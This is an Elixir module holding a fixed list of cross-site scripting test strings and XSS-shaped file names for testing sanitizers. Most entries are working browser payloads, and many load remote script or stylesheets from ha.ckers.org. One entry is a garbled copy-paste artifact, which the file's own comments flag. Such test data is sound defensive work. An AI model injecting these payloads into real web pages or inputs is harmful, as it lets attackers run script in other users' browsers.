lib/datasets/xss.ex

defmodule Datasets.Xss do
  @moduledoc """
  Static dataset of cross-site scripting (XSS) test strings.

  `data/0` returns HTML/JavaScript fragments and `files/0` returns file names,
  most of which mirror a `data/0` entry with `.txt` appended. Both functions
  return plain string lists; nothing in this module renders, sanitizes or
  writes them.

  Notes for consumers (reviewer guidance, not enforced by this module):

    * Treat every entry as hostile input. A consumer that interpolates these
      strings into HTML, attributes, URLs or scripts without context-aware
      escaping is the thing under test, so assert on the escaped/sanitized
      output rather than on the raw value.
    * Several entries reference the external host `ha.ckers.org`. If entries
      are ever loaded in a real browser or HTML renderer, do it in an isolated
      environment with no outbound network access.
    * The list is a fixed sample and is not exhaustive. Many entries exercise
      browser-specific parsing (conditional comments, `expression()`,
      `vbscript:`), so passing this list does not by itself show that a
      sanitizer handles other vectors.
  """

  @doc """
  Returns the non-empty list of XSS test strings.

  Entries are raw markup or script fragments, kept exactly as written; some
  contain embedded newline or tab characters, HTML character references or
  non-ASCII bytes. The list is a literal, so every call returns the same
  value in the same order.
  """
  @spec data :: [String.t(), ...]
  def data do
    [
      "';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\";\nalert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--\n></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>",
      "'';!--\"<XSS>=&{()}",
      "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>",
      "<IMG SRC=\"javascript:alert('XSS');\">",
      "<IMG SRC=javascript:alert('XSS')>",
      "<IMG SRC=JaVaScRiPt:alert('XSS')>",
      "<IMG SRC=javascript:alert(\"XSS\")>",
      "<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>",
      "<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">",
      "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
      "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;\n&#39;&#88;&#83;&#83;&#39;&#41;>",
      "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&\n#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>",
      "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>",
      "<IMG SRC=\"jav\tascript:alert('XSS');\">",
      "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
      "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">",
      "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">",
      "perl -e 'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";' > out",
      "<IMG SRC=\" &#14;  javascript:alert('XSS');\">",
      "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
      "<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>",
      "<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
      "<<SCRIPT>alert(\"XSS\");//<</SCRIPT>",
      "<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >",
      "<SCRIPT SRC=//ha.ckers.org/.j>",
      "<IMG SRC=\"javascript:alert('XSS')\"",
      "<iframe src=http://ha.ckers.org/scriptlet.html <",
      "\\\";alert('XSS');//",
      "</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>",
      "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">",
      "<BODY BACKGROUND=\"javascript:alert('XSS')\">",
      "<IMG DYNSRC=\"javascript:alert('XSS')\">",
      "<IMG LOWSRC=\"javascript:alert('XSS')\">",
      "<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS</br>",
      "<IMG SRC='vbscript:msgbox(\"XSS\")'>",
      "<IMG SRC=\"livescript:[code]\">",
      "<BODY ONLOAD=alert('XSS')>",
      "<BGSOUND SRC=\"javascript:alert('XSS');\">",
      "<BR SIZE=\"&{alert('XSS')}\">",
      "<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">",
      "<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">",
      "<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>",
      "<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">",
      "<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>",
      "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>",
      "<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">",
      "exp/*<A STYLE='no\\xss:noxss(\"*//*\");\nxss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>",
      "<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>",
      "<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>",
      "<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>",
      "<XSS STYLE=\"xss:expression(alert('XSS'))\">",
      "<XSS STYLE=\"behavior: url(xss.htc);\">",
      "¼script¾alert(¢XSS¢)¼/script¾",
      "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">",
      "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">",
      "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">",
      "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>",
      "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>",
      "<TABLE BACKGROUND=\"javascript:alert('XSS')\">",
      "<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">",
      "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
      "<DIV STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\">",
      "<DIV STYLE=\"background-image: url(&#1;javascript:alert('XSS'))\">",
      "<DIV STYLE=\"width: expression(alert('XSS'));\">",
      "<!--[if gte IE 4]>\n <SCRIPT>alert('XSS');</SCRIPT>\n <![endif]-->",
      "<BASE HREF=\"javascript:alert('XSS');//\">",
      "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>",
      # NOTE(review): the next entry has no leading "<" and carries a paragraph of
      # explanatory prose inside its SRC value. It looks like a copy/paste artifact
      # from the document the list was taken from rather than an intended vector;
      # confirm before counting it as EMBED coverage.
      "EMBED SRC=\"http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess=\"never\" and allownetworking=\"internal\" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:\norg/xss.swf\" AllowScriptAccess=\"always\"></EMBED>",
      "<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>",
      "a=\"get\";\nb=\"URL(\\\"\";\nc=\"javascript:\";\nd=\"alert('XSS');\\\")\";\neval(a+b+c+d);",
      "<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>\n<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>",
      "<XML SRC=\"xsstest.xml\" ID=I></XML>\n<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>",
      "<HTML><BODY>\n<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">\n<?import namespace=\"t\" implementation=\"#default#time2\">\n<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert(\"XSS\")</SCRIPT>\">\n</BODY></HTML>",
      "<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>",
      "<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->",
      "<? echo('<SCR)';\necho('IPT>alert(\"XSS\")</SCRIPT>'); ?>",
      "<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">",
      "<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">",
      "<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-",
      "<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
      "<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
      "<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
      "<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
      "<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
      "<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
      "<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
      # The remaining entries are anchors whose HREF is written in alternative
      # encodings (dotted/undotted numeric, hex, octal, percent-encoded, userinfo).
      # NOTE(review): these look like URL-filter evasion samples rather than
      # script-execution vectors — confirm how consumers are expected to score them.
      "<A HREF=\"http://66.102.7.147/\">XSS</A>",
      "<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>",
      "<A HREF=\"http://1113982867/\">XSS</A>",
      "<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>",
      "<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>",
      "<A HREF=\"h\ntt\tp://6\t6.000146.0x7.147/\">XSS</A>",
      "<A HREF=\"//www.google.com/\">XSS</A>",
      "<A HREF=\"//google\">XSS</A>",
      "<A HREF=\"http://ha.ckers.org@google\">XSS</A>",
      "<A HREF=\"http://google:ha.ckers.org\">XSS</A>",
      "<A HpREF=\"http://google.com/\">XSS</A>",
      "<A HREF=\"http://www.google.com./\">XSS</A>",
      "<A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>",
      "<A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>"
    ]
  end

  @doc """
  Returns the non-empty list of XSS-shaped file names.

  These are names only; this function does not touch the file system. Most
  entries are a `data/0` string with `.txt` appended, plus the single plain
  name `xss-data.tmp`. A consumer that displays or logs file names should
  escape them exactly as it would any other untrusted text.
  """
  @spec files :: [String.t(), ...]
  def files() do
    [
      "<BGSOUND SRC=\"javascript:alert('XSS');\">.txt",
      "<BODY BACKGROUND=\"javascript:alert('XSS')\">.txt",
      "<BODY ONLOAD=alert('XSS')>.txt",
      "<BR SIZE=\"&{alert('XSS')}\">.txt",
      "<DIV STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\">.txt",
      "<DIV STYLE=\"background-image: url(&#1;javascript:alert('XSS'))\">.txt",
      "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">.txt",
      "<DIV STYLE=\"width: expression(alert('XSS'));\">.txt",
      "<IMG DYNSRC=\"javascript:alert('XSS')\">.txt",
      "<IMG LOWSRC=\"javascript:alert('XSS')\">.txt",
      # NOTE(review): in the next two names a literal "n" sits where the matching
      # data/0 entries have a newline escape — presumably a lost backslash or a
      # deliberate substitution for a file-name-safe character; confirm.
      "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&n#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>.txt",
      "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;n&#39;&#88;&#83;&#83;&#39;&#41;>.txt",
      "<IMG SRC=\" &#14;  javascript:alert('XSS');\">.txt",
      "<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>.txt",
      "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>.txt",
      "<IMG SRC=\"javascript:alert('XSS');\">.txt",
      "<IMG SRC=\"javascript:alert('XSS')\".txt",
      "<IMG SRC=javascript:alert('XSS')>.txt",
      "<IMG SRC=javascript:alert(\"XSS\")>.txt",
      "<IMG SRC=JaVaScRiPt:alert('XSS')>.txt",
      # NOTE(review): "javtascript" has a literal "t" where the matching data/0
      # entry has a tab escape inside "jav<TAB>ascript" — same question as above.
      "<IMG SRC=\"javtascript:alert('XSS');\">.txt",
      "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">.txt",
      "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">.txt",
      "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">.txt",
      "<IMG SRC=\"livescript:[code]\">.txt",
      "<IMG SRC='vbscript:msgbox(\"XSS\")'>.txt",
      "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>.txt",
      "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">.txt",
      "<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">.txt",
      "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">.txt",
      "perl -e 'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";' > out.txt",
      "<TABLE BACKGROUND=\"javascript:alert('XSS')\">.txt",
      "<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">.txt",
      # The only entry that is an ordinary file name with no markup in it.
      "xss-data.tmp",
      "<XSS STYLE=\"behavior: url(xss.htc);\">.txt",
      "<XSS STYLE=\"xss:expression(alert('XSS'))\">.txt",
      "'';!--\"<XSS>=&{()}.txt"
    ]
  end
end